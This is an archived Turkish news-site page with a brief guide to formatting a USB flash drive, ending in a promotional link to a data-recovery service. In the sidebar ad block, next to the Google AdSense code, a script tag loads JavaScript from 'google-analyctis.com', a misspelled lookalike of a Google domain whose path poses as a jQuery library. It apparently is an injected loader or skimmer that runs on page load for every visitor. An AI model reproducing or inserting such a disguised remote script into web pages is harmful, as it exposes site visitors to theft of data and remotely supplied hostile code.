<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr" lang="tr">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title> USB Flash Bellek Nasıl Formatlanır?</title>

<meta name="description" content="USB flash depolama belleklerinizi farklı bilgisayarlarda kullanmaya başladığınız zamanlarda virüs problemleri ile karşılaşmanız olası bir durumdur." />
<meta name="keywords" content="" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="-1" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="content-Language" content="tr" />
<meta name="robots" content="index, follow" />
<meta http-equiv="refresh" content="300" />

<meta property="og:site_name" content="http://www.kibristahaber.com/" />
<meta property="og:url" content="http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" />
<meta property="og:description" content="USB flash depolama belleklerinizi farklı bilgisayarlarda kullanmaya başladığınız zamanlarda virüs problemleri ile karşılaşmanız olası bir durumdur. " />
<meta property="og:image" content="http://www.kibristahaber.com/images/haberler/usb_flash_bellek_nasil_formatlanir_h160212.jpg" />
<meta property="og:type" content="article" />
<meta property="fb:image" content="http://www.kibristahaber.com/images/haberler/usb_flash_bellek_nasil_formatlanir_h160212.jpg" />
<link rel="image_src" href="http://www.kibristahaber.com/images/haberler/usb_flash_bellek_nasil_formatlanir_h160212.jpg" />



<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="/rss.php" />
<link rel="shortcut icon" href="favicon.ico" />
<link rel="alternate" hreflang="tr" href="http://www.kibristahaber.com/">
<link href="/_themes/hs-live/style/evo.css" rel="stylesheet" type="text/css"  media="screen" />
<!--[if lt IE 8]><style type="text/css"> @import "/_themes/hs-live/style/ie8.css";</style><![endif]-->
<link rel="canonical" href="http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html">


<style type="text/css">
.container {
	margin-right: auto;
	margin-left: auto;
}
</style>


<!-- Yatay manşet font ve boyut özelleştirmesi -->
<style type="text/css">
.module .news li a.title {
		}

.module .news li a.spot {
		}

/*
.cuff a.main_cuff div, .cuff a.main_cuff h2, .cuff a.main_cuff span, .cuff a.main_cuff b {
	}
*/



</style>
<!-- Yatay manşet font ve boyut özelleştirmesi -->




</head><body>

<div id="fb-root"></div>


<!-- Container -->
<div class="container">



<!-- Left Ad Areas -->
<div class="left_ad_areas">
                                                </div>
<!-- Left Ad Areas -->

    <!-- V6 START -->
    
	<!-- Header -->
	<div id="header">
        <!-- Navbar -->
		<div id="navbar" style="margin-bottom: 5px;">
		
			<ul class="navbar-menu-sag">
			                <li class="nms1"><span></span><a href="/uyelik.html">ÜYE OL</a></li>
				<li><span></span><a href="/login.html">ÜYE GİRİŞİ</a></li>
            			</ul>
            
			<div class="tarih">22 Aralık 2016 Perşembe</div>

			<ul class="navbar-menu">
				<li><a href="/sitene-ekle.html" >Sitene Ekle</a></li>
				<li><a href="/m/">Mobil</a></li>
				<li><a href="/kunye.html">Künye</a></li>
				<li><a href="/iletisim.html">İletişim</a></li>
			</ul>

		</div>
		<!--#Navbar -->

		

		<!-- Header Orta -->
		<div class="headerOrta">
		
			<!-- Logo -->
			<div class="logo">
				<a href="http://www.kibristahaber.com/" class="logo"><img src="http://www.kibristahaber.com/images/banner/logo.png" alt=" USB Flash Bellek Nasıl Formatlanır?" /></a>
			</div>
			<!--#Logo -->
			
			<!-- Reklam -->
			<div class="reklam"></div>
			<!--#Reklam -->
		
		</div>
		<!--#Header Orta -->
<div class="cboth"></div>
		<!-- Menü1 -->
		<div class="menu1">
			<ul class="sosyal">
				<li><a class="facebook" href=""></a></li>
				<li><a class="twitter" href=""></a></li>
				<li><a class="friendfeed" href=""></a></li>
				<li><a class="rss" href="/rss.php"></a></li>
                
			</ul>
			<ul class="menu-ul">
                <li><a href="/index.html" title="Ana Sayfa">Ana Sayfa</a></li>
                <li><a href="/foto-galeri.html" title="Foto Galeri">Foto Galeri</a></li>
                <li><a href="/video-galeri.html" title="Video Galeri">Video Galeri</a></li>
                <li><a href="/yazarlar.html" title="Yazarlar">Yazarlar</a></li>
                                
			</ul>
		</div>
		<!--#Menü1 -->
		
		<!-- Menü2 -->
		<div class="menu2">
			<ul>
				 
											<li class="kategori0"><a href="/gundem" id="k1">GÜNDEM</a></li><li class="kategori1"><a href="/turkiye" id="k23">TÜRKİYE</a></li><li class="kategori2"><a href="/kibris" id="k20">KIBRIS</a></li><li class="kategori3"><a href="/ingiltere" id="k24">İNGİLTERE</a></li><li class="kategori4"><a href="/dunya" id="k2">DÜNYA</a></li><li class="kategori5"><a href="/spor" id="k5">SPOR</a></li><li class="kategori6"><a href="/magazin" id="k22">MAGAZİN</a></li><li class="kategori7"><a href="/ekonomi" id="k3">EKONOMİ</a></li><li class="kategori8"><a href="/teknoloji" id="k4">TEKNOLOJİ</a></li><li class="kategori9"><a href="/kadin" id="k13">KADIN</a></li><li class="kategori10"><a href="/kultur" id="k6">KÜLTÜR</a></li><li class="kategori_devam"><a href="javascript:void(0);" class="diger" onclick="diger_kategoriler();" title="Diğer Kategoriler"></a></li> 
												</ul>
            				
			<div class="diger2">
				<a href="#">Diğer</a>
			</div>




		</div>
		<div class="menu2a digerKategoriler" style="display: none">
			<ul>
				<li class="kategori0"><a href="/yasam" id="k7">YAŞAM</a></li><li class="kategori1"><a href="/saglik" id="k8">SAĞLIK</a></li><li class="kategori2"><a href="/egitim" id="k11">EĞİTİM</a></li><li class="kategori3"><a href="/siyaset" id="k16">SİYASET</a></li><li class="kategori4"><a href="/medya" id="k17">MEDYA</a></li><li class="kategori5"><a href="/eglence" id="k27">EĞLENCE</a></li><li class="kategori6"><a href="/sinema" id="k28">SİNEMA</a></li><li class="kategori7"><a href="/asayis" id="k39">ASAYİŞ</a></li><li class="kategori8"><a href="/genel" id="k40">GENEL</a></li><li class="kategori9"><a href="/kultur-sanat" id="k41">KÜLTÜR SANAT</a></li><li class="kategori10"><a href="/politika" id="k42">POLİTİKA</a></li><li class="kategori11"><a href="/cevre" id="k45">ÇEVRE</a></li><li class="kategori12"><a href="/bilim-ve-teknoloji" id="k46">BİLİM VE TEKNOLOJİ</a></li><li class="kategori13"><a href="/yerel" id="k47">YEREL</a></li> 
			</ul>
		</div>
		<!--#Menü2 -->
		
		<!-- Header Blok -->
		<div class="headerBlok">
		
			<!-- Arama -->
			<div class="arama">
				<form action="/" method="get" class="search fright">
                <fieldset>
					<input type="hidden" name="m" value="arama">
					<input type="text" value="Haber ara..." onfocus="this.value=''" onblur="if(this.value=='')this.value='Haber ara...'" name="q" class="arasana fleft" />
					<input type="image" src="/_themes/hs-live/images/v6/arabtn.png" value="Arama" class="fleft" />
                </fieldset>
				</form>
			</div>
			<!--#Arama -->
		
			<!-- Son Dakika -->
			<div class="last_minute">
				<div class="sdBaslik"><span>SON DAKİKA</span></div>
				<div class="band">
			<div class="news">
													<div><a href="/guncel/ankarayi-kana-bulayan-teroristle-ilgili-ilk-iddia-suriyeli-salih-nacar-h159404.html" title="Ankara’yı Kana Bulayan Teröristle İlgili İlk İddia: Suriyeli Salih Nacar"> Ankara’yı Kana Bulayan Teröristle İlgili İlk İddia: Suriyeli Salih Nacar</a></div>
													<div><a href="/guncel/perde-aralaniyor-ankarayi-kana-bulayan-arac-ortaya-cikti-h159403.html" title="Perde Aralanıyor Ankara’yı Kana Bulayan Araç Ortaya Çıktı"> Perde Aralanıyor Ankara’yı Kana Bulayan Araç Ortaya Çıktı</a></div>
													<div><a href="/guncel/efkan-ala-ankara-saldirisindan-4-saat-sonra-iki-cumlelik-aciklama-yapti-h159402.html" title="Efkan Ala, Ankara Saldırısından 4 Saat Sonra İki Cümlelik Açıklama Yaptı"> Efkan Ala, Ankara Saldırısından 4 Saat Sonra İki Cümlelik Açıklama Yaptı</a></div>
													<div><a href="/spor/4-buyuklerden-terore-lanet-mesaji-h159401.html" title="4 Büyüklerden Teröre Lanet Mesajı"> 4 Büyüklerden Teröre Lanet Mesajı</a></div>
													<div><a href="/spor/ridvan-dilmen-ankaradaki-saldirinin-ardindan-mac-yorumu-yapmadi-h159400.html" title="Rıdvan Dilmen, Ankara’daki Saldırının Ardından Maç Yorumu Yapmadı"> Rıdvan Dilmen, Ankara’daki Saldırının Ardından Maç Yorumu Yapmadı</a></div>
													<div><a href="/guncel/erdogan-mesru-mudafaa-hakkimizi-cekinmeden-kullanacagiz-h159399.html" title="Erdoğan: Meşru Müdafaa Hakkımızı Çekinmeden Kullanacağız"> Erdoğan: Meşru Müdafaa Hakkımızı Çekinmeden Kullanacağız</a></div>
													<div><a href="/guncel/erdogan-sinirimizda-yeni-bir-kandilin-olusmasina-asla-izin-vermeyecegiz-h159368.html" title="Erdoğan: Sınırımızda Yeni Bir Kandil’in Oluşmasına Asla İzin Vermeyeceğiz"> Erdoğan: Sınırımızda Yeni Bir Kandil’in Oluşmasına Asla İzin Vermeyeceğiz</a></div>
													<div><a href="/spor/besiktasli-mario-gomez-senol-gunesin-elini-sikmadi-h159398.html" title="Beşiktaşlı Mario Gomez, Şenol Güneş’in Elini Sıkmadı"> Beşiktaşlı Mario Gomez, Şenol Güneş’in Elini Sıkmadı</a></div>
													<div><a href="/guncel/erdogan-mesru-mudafaa-hakkimizi-cekinmeden-kullanacagiz-h159397.html" title="Erdoğan: Meşru Müdafaa Hakkımızı Çekinmeden Kullanacağız"> Erdoğan: Meşru Müdafaa Hakkımızı Çekinmeden Kullanacağız</a></div>
													<div><a href="/politika/abdullah-gul-ankaradaki-toror-saldirisini-kinadi-h159396.html" title="Abdullah Gül, Ankara’daki Törör Saldırısını Kınadı"> Abdullah Gül, Ankara’daki Törör Saldırısını Kınadı</a></div>
											</div>
				</div>
			</div>
			<!--#Son Dakika -->
		
		</div>
		<!--#Header Blok -->
        
	</div>  
	<!-- V6 END -->

    
    <div class="cboth"></div>
	



<div id="sliderHaberler">
  <!-- üst manşetler -->
          <ul>
				
			<li><a href="/yasam/smsle-gelen-buyuk-tehlike-h157564.html" title="SMS’le Gelen Büyük Tehlike" class="thumbnail" ><img src="/_themes/hs-live/images/no_headline_thumb.jpg" alt="SMS’le Gelen Büyük Tehlike" />
			<span><b>yasam/smsle-gelen-buyuk-tehlike</b></span></a>
			</li>


		
			<li><a href="/bursa/mudanyalilar-toz-duman-icinde-h156108.html" title="Mudanyalılar Toz Duman İçinde" class="thumbnail" ><img src="/_themes/hs-live/images/no_headline_thumb.jpg" alt="Mudanyalılar Toz Duman İçinde" />
			<span><b></b></span></a>
			</li>


		
			<li><a href="/gundem/belediyenin-kamyonundan-100-kg-bomba-cikti-h154503.html" title="Belediyenin kamyonundan 100 kg bomba çıktı" class="thumbnail" ><img src="http://www.kibristahaber.com/images/haberler/ustmanset/55d84055d7931.jpg" alt="Belediyenin kamyonundan 100 kg bomba çıktı" />
			<span><b>Belediyenin kamyonundan 100 kg bomba...</b></span></a>
			</li>


		
			<li><a href="/gundem/mutlu-kaya-ilk-kez-ayaga-kalkti-h154488.html" title="Mutlu Kaya ilk kez ayağa kalktı" class="thumbnail" ><img src="http://www.kibristahaber.com/images/haberler/ustmanset/55ce16d8580e0.jpg" alt="Mutlu Kaya ilk kez ayağa kalktı" />
			<span><b>Mutlu Kaya ilk kez ayağa...</b></span></a>
			</li>


		
           
          </ul>
</div>


		<div class="flashaber">
    	<div class="flashaber-bg">
        <img src="/_themes/hs-live/images/flashaber.gif" alt="Flaş Haber - Elektrik Faturasına Soygun Gibi Zam, Dağıtım Bedeli Yüzde 250 Arttı" />
		<a href="/ekonomi/elektrik-faturasina-soygun-gibi-zam-dagitim-bedeli-yuzde-250-artti-h157672.html">Elektrik Faturasına Soygun Gibi Zam, Dağıtım Bedeli Yüzde 250 Arttı</a>
		</div>
	</div>
	    <div class="beyaz"></div>
	<div class="cboth"></div>
	


	
	<div class="cboth"></div>

	<!-- Module -->
	<div class="module fleft" >
   	  	<script type="text/javascript">
	var fbTitle  = encodeURIComponent("USB Flash Bellek Nasıl Formatlanır?");
	var fbUrl    = encodeURIComponent(location.href);
	var fbThumb  = "http://www.kibristahaber.com/images/haberler/usb_flash_bellek_nasil_formatlanir_h160212.jpg";
	var fbDesc   = encodeURIComponent("USB flash depolama belleklerinizi farklı bilgisayarlarda kullanmaya başladığınız zamanlarda virüs problemleri ile karşılaşmanız olası bir durumdur.");
</script>


<!-- kapsa -->
<div id="kapsayici">


	<h1> USB Flash Bellek Nasıl Formatlanır?</h1>
	<h2>USB flash depolama belleklerinizi farklı bilgisayarlarda kullanmaya başladığınız zamanlarda virüs problemleri ile karşılaşmanız olası bir durumdur. </h2>

	    <!-- date and hit -->
		<div class="info">
		<div class="date fleft">21 Ekim 2016 Cuma 01:27</div>
			    </div>
	    <!-- date and hit -->
        
				<!-- detail -->
		<div class="detail">


				<!-- news image -->
		<img src="http://www.kibristahaber.com/images/haberler/usb_flash_bellek_nasil_formatlanir_h160212.jpg" alt=" USB Flash Bellek Nasıl Formatlanır?" class="news_image cleft fleft" />
		<!-- news image -->
		        
			<!-- tavsiye -->
				<div class="fb_like fleft cleft margin-right" style="border:none; width:300px; height:30px"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html&amp;layout=standard&amp;show_faces=true&amp;width=300&amp;action=recommend&amp;colorscheme=light&amp;height=30" scrolling="no" frameborder="0" allowTransparency="true"></iframe></div>    
			<!-- tavsiye -->

			
			
			<!-- news -->
			<div id="news_container" class="body">
                
								<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">Flash belleğinizi her ne kadar koruyor olursanız olun belirli bir kullanım sonrasında virüs problemleri ile karşılaşabilirsiniz.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">Virüslerin ortaya çıktığı zamanlarda USB flash belleğinizi biçimlendirmeniz yani format atmanız gerekebilir. Peki biçimlendirme işlemi nasıl yapılır?<o:p></o:p></span></p>
<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">1. USB flash belleğinizi bilgisayara takın ve Bilgisayarım sekmesine tıklayın.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">2. Bilgisayarım üzerinden USB belleğinizin simgesine sağ tıklayarak açılan seçenekler arasından Biçimlendir seçeneğini işaretleyin.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">3. Biçimlendir işlemini seçtikten sonra karşınıza gelen yeni pencerede yer alan Dosya Sistemi başlığı altındaki seçenekler arasından flash belleğiniz 8 GB ve üzerindeyse NTFS biçimlendirme seçeneğini işaretleyin. <o:p></o:p></span></p>
<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">Eğer bu işlemi yapmazsanız flash belleğinizin içine dosya boyutu 4 GB ve üzeri olan dosyaları tek bir seferde atamazsınız. 4 GB ve altındaki boyutlar için ise FAT32 veya NTFS özelliğini seçebilirsiniz. Seçiminizi yaptıktan sonra Başlat butonuna basmanız yeterli olacaktır.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">4. Biçimlendirme Seçenekleri altında yer alan Hızlı Biçimlendir seçeneği ile de daha hızlı biçimlendirme yapmayı deneyebilirsiniz.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="font-size:12.0pt;line-height:107%">Usb flash belleğiniz ile ilgili ileri düzeyde problemler yaşıyorsanız GOLD DATA firmasının </span><a href="https://www.goldverikurtarma.com/flash-disk-veri-kurtarma"><b><span style="font-size:12.0pt;line-height:&#10;107%">flash disk kurtarma</span></b></a><span style="font-size:12.0pt;&#10;line-height:107%"> hizmeti ile flash diskiniz içerisindeki tüm verileriniz %97 başarılı kurtarma oranı ile geri getirilebilir.<o:p></o:p></span></p>
				

							</div>
			<!-- news -->
		    
		    <!-- gallery
		    		    -->

		    		        
		        
		       		 <!-- ilgili galeriler -->
        <div class="album_haber_detay fleft cleft">
			<ul>
				<li class="title"><img src="/_themes/hs-live/images/ilgiligaleriler.jpg" /></li>
								<li><a href="/dunyadaki-en-garip-kanunlar-resimleri,59.html" title="Dünya'daki En Garip Kanunlar..."><img src="http://www.kibristahaber.com/images/album/thumbs/somonn.jpg" alt="Dünya'daki En Garip Kanunlar..." /><span>Dünya'daki En Garip Kanunlar...</span></a></li>
								<li><a href="/yag-yakici-besinler-resimleri,57.html" title="Yağ Yakıcı Besinler.."><img src="http://www.kibristahaber.com/images/album/thumbs/ygurt.jpg" alt="Yağ Yakıcı Besinler.." /><span>Yağ Yakıcı Besinler..</span></a></li>
								<li><a href="/sizce-hangisi-daha-iyi-resimleri,54.html" title="Sizce Hangisi Daha İyi ?"><img src="http://www.kibristahaber.com/images/album/thumbs/sizce-hangisi-daha-iyi-16.jpg" alt="Sizce Hangisi Daha İyi ?" /><span>Sizce Hangisi Daha İyi ?</span></a></li>
								<li><a href="/bedelli-askerlik-caps-39-leri-resimleri,51.html" title="Bedelli askerlik caps&#39;leri"><img src="http://www.kibristahaber.com/images/album/thumbs/bedelli-askerlik-caps-39-leri-2.jpg" alt="Bedelli askerlik caps&#39;leri" /><span>Bedelli askerlik caps&#39;leri</span></a></li>
							</ul>
        </div>
            <!-- ilgili galeriler -->
		           
		
		<div class="cboth"></div>

		<!-- share -->
				<div class="share kosebuk">
			<b class="fleft margin-right">PAYLAŞ</b>
		    <ul class="social_share fleft">
			<li><a href="javascript:void(0);" onClick="shareFacebook(fbThumb, fbUrl, fbTitle, fbDesc);" rel="nofollow" class="gecis-efekt fb"></a></li>
			<li><a href="http://twitter.com/intent/tweet?text=+USB+Flash+Bellek+Nas%C4%B1l+Formatlan%C4%B1r%3F&url=http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" class="gecis-efekt tw" title="Twitter'da Paylaş" rel="nofollow" target="_blank"></a></li>
			<li><a href="http://friendfeed.com/share?url=http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html&title= USB Flash Bellek Nasıl Formatlanır?" class="gecis-efekt ff" title="FriendFeed'de Paylaş" rel="nofollow" target="_blank"></a></li>
			<li><a href="http://del.icio.us/post?url=http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" title="Delicious'ta Paylaş" rel="nofollow" target="_blank" class="gecis-efekt del"></a></li>
			<li><a href="http://plus.google.com/share?url=http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" title="Google'da Paylaş" rel="nofollow" target="_blank" class="gecis-efekt google"></a></li>
			<li><a href="http://www.reddit.com/submit?url=http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" title="Reddit'te Paylaş" rel="nofollow" target="_blank" class="gecis-efekt red"></a></li>
			<li><a href="http://www.printfriendly.com/print?url=http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" title="Yazıcı dostu sayfa" rel="nofollow" target="_blank" class="gecis-efekt print"></a></li>
		    </ul>
		
		
		    <!-- begen -->
		    <ul class="begen fright">
			<li style="width:65px"><g:plusone size="medium"></g:plusone></li>
			<li style="width:95px"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-lang="tr">Tweet</a></li>
						<li style="width:90px"><div style="margin-right:10px" class="fb-like" data-href="http://www.kibristahaber.com/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" data-layout="button_count" data-action="like" data-show-faces="false" data-width="200" data-share="false"></div>
			</li>
					    </ul>
		    <!-- begen -->

		    <div class="cboth"></div>
		
		
		</div>
		<!-- share -->


		<!-- Comments -->
					        <!-- add comment -->
    <div class="kosebuk success" style="display:none">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir, teşekkür ederiz.</div>
    <div class="addcomment kosebuk" id="addcomment">
        
        <h4><i class="simge yorumyaz" style="margin-top: 0;"></i>Bu habere yorum yapan ilk siz olun!</h4>
        <form name="comment" class="comment_form">
        
                <li style="line-height: 30px;">
            <div>Ad Soyad: </div>
            <p><input type="text" name="isim" class="input required adsoyad kosebuk" title="Ad soyad gerekli!" /></p>
        </li>
               
        <li>
            <div>Yorum: </div>
            <p><textarea name="yorum" cols="45" rows="5" class="required kosebuk" maxlength="1000" style="width:380px;max-width:380px;" 
            id="comment_field" onkeyup="textKey(this.form)" onfocus="textCheckFocus(this)" onblur="textCheckBlur(this)">Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!</textarea><input type="hidden" class="answer" name="answer" value="" /></p>
        </li>
        
        <li>
            <div> &nbsp;</div>
            <p class="send">
            <span class="answer"><b>@name</b> <a href="javascript:void(0)" class="close">x</a></span>
            <a href="javascript:void(0)" class="gonder_butonu" onclick="javascript:comment_send(160212);"/></a>
        <input name="character" id="character" disabled size="3" value="1000"></p>
        </li>
    
        <input type="hidden" name="hid" value="160212" />
        <input type="hidden" name="tip" value="haber" />
        <input type="hidden" name="cevap" value="" class="answer" />
    
        <div class="attention"><i class="simge bilgilendirme" style="margin-left: 5px;margin-top: 5px;"></i>UYARI: Küfür, hakaret, rencide edici cümleler veya imalar, inançlara saldırı içeren, imla kuralları ile yazılmamış, Türkçe karakter kullanılmayan ve tamamı büyük harflerle yazılmış yorumlar onaylanmamaktadır. Ayrıca suç teşkil edecek hakaret içerikli yorumlar hakkında muhatapları tarafından dava açılabilmektedir.</div>
    
        
        </form>
    </div>
    <!-- add comment --> 



				<!-- Comments -->
		
		
		<!-- other news -->
		<div class="other_news">
			<div class="kosebuk-ust"><i class="simge ilgilihaber"></i>İlgili Haberler</div>
		    <ul class="content">
						<li>
				<a href="/teknoloji/veri-kurtarma-yazilimi-nedir-h160217.html" title="Veri Kurtarma Yazılımı Nedir?">
				<img src="http://www.kibristahaber.com/images/haberler/thumbs/veri_kurtarma_yazilimi_nedir_h160217.jpg" alt="Veri Kurtarma Yazılımı Nedir?" />
				<b> Veri Kurtarma Yazılımı Nedir?</b>
			    </a>
			</li>
						<li>
				<a href="/teknoloji/usb-flash-bellek-nasil-formatlanir-h160212.html" title="USB Flash Bellek Nasıl Formatlanır?">
				<img src="http://www.kibristahaber.com/images/haberler/thumbs/usb_flash_bellek_nasil_formatlanir_h160212.jpg" alt="USB Flash Bellek Nasıl Formatlanır?" />
				<b> USB Flash Bellek Nasıl Formatlanır?</b>
			    </a>
			</li>
						<li>
				<a href="/teknoloji/facebook-begenisi-ne-kadar-kazandirir-h160211.html" title="Facebook Beğenisi Ne Kadar Kazandırır?">
				<img src="http://www.kibristahaber.com/images/haberler/thumbs/facebook_begenisi_ne_kadar_kazandirir_h160211.jpg" alt="Facebook Beğenisi Ne Kadar Kazandırır?" />
				<b> Facebook Beğenisi Ne Kadar Kazandırır?</b>
			    </a>
			</li>
						<li>
				<a href="/teknoloji/alternatif-tatil-yolu-villa-kiralama-h159988.html" title="Alternatif Tatil Yolu: Villa Kiralama">
				<img src="/_themes/hs-live/images/no_headline_thumb.jpg" alt="Alternatif Tatil Yolu: Villa Kiralama" />
				<b>Alternatif Tatil Yolu: Villa Kiralama</b>
			    </a>
			</li>
						<li>
				<a href="/teknoloji/instagram-takipci-h159847.html" title="İnstagram Takipçi">
				<img src="/_themes/hs-live/images/no_headline_thumb.jpg" alt="İnstagram Takipçi" />
				<b> İnstagram Takipçi</b>
			    </a>
			</li>
						<li>
				<a href="/teknoloji/logocuncom-web-tasarim-hizmetleri-h158074.html" title="Logocun.com Web Tasarım Hizmetleri">
				<img src="/_themes/hs-live/images/no_headline_thumb.jpg" alt="Logocun.com Web Tasarım Hizmetleri" />
				<b>Logocun.com Web Tasarım Hizmetleri</b>
			    </a>
			</li>
						<li>
				<a href="/teknoloji/hayaletin-intikami-turkce-dublaj-olarak-sizlerle-h157845.html" title="Hayaletin intikamı türkçe dublaj olarak sizlerle">
				<img src="/_themes/hs-live/images/no_headline_thumb.jpg" alt="Hayaletin intikamı türkçe dublaj olarak sizlerle" />
				<b>Hayaletin intikamı türkçe dublaj olarak sizlerle</b>
			    </a>
			</li>
						<li>
				<a href="/teknoloji/konya-web-tasarim-ajansindan-tasarimlar-h157776.html" title="Konya Web Tasarım Ajansından Tasarımlar">
				<img src="/_themes/hs-live/images/no_headline_thumb.jpg" alt="Konya Web Tasarım Ajansından Tasarımlar" />
				<b>Konya Web Tasarım Ajansından Tasarımlar</b>
			    </a>
			</li>
					    </ul>
		</div>
		<!-- other news -->
		






	    </div>
	    <!-- detail -->




</div>
<!-- kapsa -->

  	</div>
	<!-- Module -->
	
			<!-- Right Block -->
		<div class="right fright">
			

			<div id="bl_26">
			<div class="ad300" id="bannerDiv26" style="margin-bottom:5px">
				<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
 style="display:inline-block;width:300px;height:250px"
 data-ad-client="ca-pub-9108787810443583"
 data-ad-slot="9660555152"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
			</div>
		</div>
	
    		<!-- authors -->
	  	<div class="sagBlok block authors">
          <div class="sagBaslik">
				<span class="tumu"><a href="/yazarlar.html">TÜMÜ</a></span>
	    	<span class="baslik">Yazarlar</span>
</div>

            <!-- scroll -->
            <div class="scroll">
            
                <!-- slider items -->
                <div class="items">
                    
                    <!-- seperator -->
                    <ul class="seperator">
                        
                                                <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/yazarfoto885.jpg" alt="Bekir Coşkun" />
                            <a href="/hindistanda-gazetecilere-tecavuz-de-ediyorlar-makale,602.html" class="yazar" title="Bekir Coşkun">Bekir Coşkun</a>
                            <a href="/hindistanda-gazetecilere-tecavuz-de-ediyorlar-makale,602.html" class="son-yazi" title="Hindistan&#039;da Gazetecilere Tecavüz de Ediyorlar...">Hindistan'da Gazetecilere Tecavüz de Ediyorlar...</a>        
                        </li>
                                                                        <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/ozden-yolagiden-637y.jpg" alt="Özden Yolagiden" />
                            <a href="/94-yildir-sonmeyen-ates-makale,596.html" class="yazar" title="Özden Yolagiden">Özden Yolagiden</a>
                            <a href="/94-yildir-sonmeyen-ates-makale,596.html" class="son-yazi" title="94 yıldır sönmeyen ateş">94 yıldır sönmeyen ateş</a>        
                        </li>
                                                                        <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/engin-civan-44y.jpg" alt="Engin Civan" />
                            <a href="/basbakanin-abd-ziyaretinin-ardindan-makale,595.html" class="yazar" title="Engin Civan">Engin Civan</a>
                            <a href="/basbakanin-abd-ziyaretinin-ardindan-makale,595.html" class="son-yazi" title="Başbakan&#039;ın ABD Ziyaretinin Ardından...">Başbakan'ın ABD Ziyaretinin Ardından...</a>        
                        </li>
                                                                        <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/images.jpg" alt="Turgay Tezcanlı" />
                            <a href="/turkiye-kanli-ic-hesaplasmaya-mi-gidiyor-makale,583.html" class="yazar" title="Turgay Tezcanlı">Turgay Tezcanlı</a>
                            <a href="/turkiye-kanli-ic-hesaplasmaya-mi-gidiyor-makale,583.html" class="son-yazi" title="Türkiye Kanlı, İç Hesaplaşmaya Mı Gidiyor..?">Türkiye Kanlı, İç Hesaplaşmaya Mı Gidiyor..?</a>        
                        </li>
                        </ul><ul class="seperator">                                                <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/DenizUlkeAribogan.jpg" alt="Asiye Sınıcı" />
                            <a href="/cocuklarda-ergenlik-donemi-makale,582.html" class="yazar" title="Asiye Sınıcı">Asiye Sınıcı</a>
                            <a href="/cocuklarda-ergenlik-donemi-makale,582.html" class="son-yazi" title="Çocuklar&#039;da Ergenlik Dönemi">Çocuklar'da Ergenlik Dönemi</a>        
                        </li>
                                                                        <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/26_b.jpg" alt="Evrim Duyal" />
                            <a href="/izmirli-olmak-makale,581.html" class="yazar" title="Evrim Duyal">Evrim Duyal</a>
                            <a href="/izmirli-olmak-makale,581.html" class="son-yazi" title="İzmir&#039;li Olmak..">İzmir'li Olmak..</a>        
                        </li>
                                                                        <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/vsarak.jpg" alt="Vedat Sarak" />
                            <a href="/haybeden-dialoglar-makale,574.html" class="yazar" title="Vedat Sarak">Vedat Sarak</a>
                            <a href="/haybeden-dialoglar-makale,574.html" class="son-yazi" title="Haybeden Dialoglar">Haybeden Dialoglar</a>        
                        </li>
                                                                        <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/80908.jpg" alt="Hakan Şevket Telkes" />
                            <a href="/cekim-yasasi…-makale,553.html" class="yazar" title="Hakan Şevket Telkes">Hakan Şevket Telkes</a>
                            <a href="/cekim-yasasi…-makale,553.html" class="son-yazi" title="Çekim Yasası…">Çekim Yasası…</a>        
                        </li>
                        </ul><ul class="seperator">                                                <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/1f54ed3.jpg" alt="Hasan Güneş" />
